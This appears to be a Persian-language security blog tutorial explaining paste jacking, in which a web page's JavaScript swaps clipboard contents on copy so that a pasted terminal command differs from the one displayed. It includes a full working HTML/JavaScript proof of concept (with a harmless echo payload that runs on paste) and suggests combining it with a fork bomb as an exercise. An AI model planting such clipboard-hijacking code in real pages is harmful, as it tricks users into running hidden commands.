امنیتتست نفوذ

حمله Paste Jacking چیست؟

حمله Paste Jacking چیست؟

احتمالاً تا به حال برای شما هم پیش آمده که بخواهید از روی یک صفحه اینترنتی چیزی را کپی کرده و در یک جای دیگر Paste نمایید. به ویژه در فرم‌هایی که از شما دو مرتبه تقاضای ایمیل می کنند ، یا برای خیلی از لینوکس کارها و آنهایی که می خواهند Command را از اینترنت کپی کرده و در ترمینال لینوکس پیست نمایند و احیاناً خیلی سریع هم Enter را میزنند. طبق تحقیقات گروه پژوهشی آفسک احتمال هک شدن شما با این تکنیک بسیار بالا می باشد که به حمله Paste Jacking معروف است.

هنگامی که CTRL + C را روی صفحه کلید خود فشار می دهید تا یک متنی را کپی کنید ، این متن کپی شده در کلیپ بورد شما قرار میگیرد. حال اگر سایتی بخواهد به سادگی میواند با انجام یک کد جاوا اسکریپت ساده این متن را در کلیپ بورد به سادگی به محتوایی که خود دوست دارد تغییر دهد.

خب اجازه دهید تا با یک مثال عملی این سناریو را برای شما نمایش دهیم. به وسیله Notepad یک سند جدید درست کنید سپس کدهای مربوطه را داخل آن کپی پیست نمایید. نترسید تا اینجای کار خطری شما را تهدید نمیکند.

بعد از این کار این سند را به صورت html ذخیره نمایید. (فقط کافی است موقع ذخیره کردن پسوند txt را حذف و سپس از عبارت html به جای آن استفاده کنید)

<html>
<head>
    <title>Pastejacking exploit example</title>
    <meta name=viewport content="width=device-width, initial-scale=1">    
</head>

    <body>
    To test the pastejacking copy the text from this page and try to execute on your terminal.
        </br>

        <p>Copy:  echo "this is a text for copy."</p>
        <script>
            document.addEventListener('copy', function(e){
                console.log(e);
                e.clipboardData.setData('text/plain', 'echo \' ***** kaliboys ****\t\'\r\n');
                e.preventDefault();
            });
        </script>
    </body>

</html>

حال فکر کنید در مثال بالا به جای یک دستور جز echo یک دستور حیاتی وارد میشد ، چه اتفاقی می افتاد؟ به عنوان تمرین میتوانید این آموزش را با fork bomb ادغام کنید.

امتیاز ۰ از ۵ – ۰ رای
حمله Paste Jacking چیست؟ در حال ثبت رای

یوسف وفایی

فارغ التحصیل کارشناسی IT، علاقه مند به برنامه نویسی و علم امنیت، عاشق یادگیری حرفه های جدید، کنجکاو برای همه چیز، همچنین همیشه تلاش میکنم تا به هدفم برسم...

‫2 دیدگاه ها

دیدگاهتان را بنویسید

نشانی ایمیل شما منتشر نخواهد شد.

دکمه بازگشت به بالا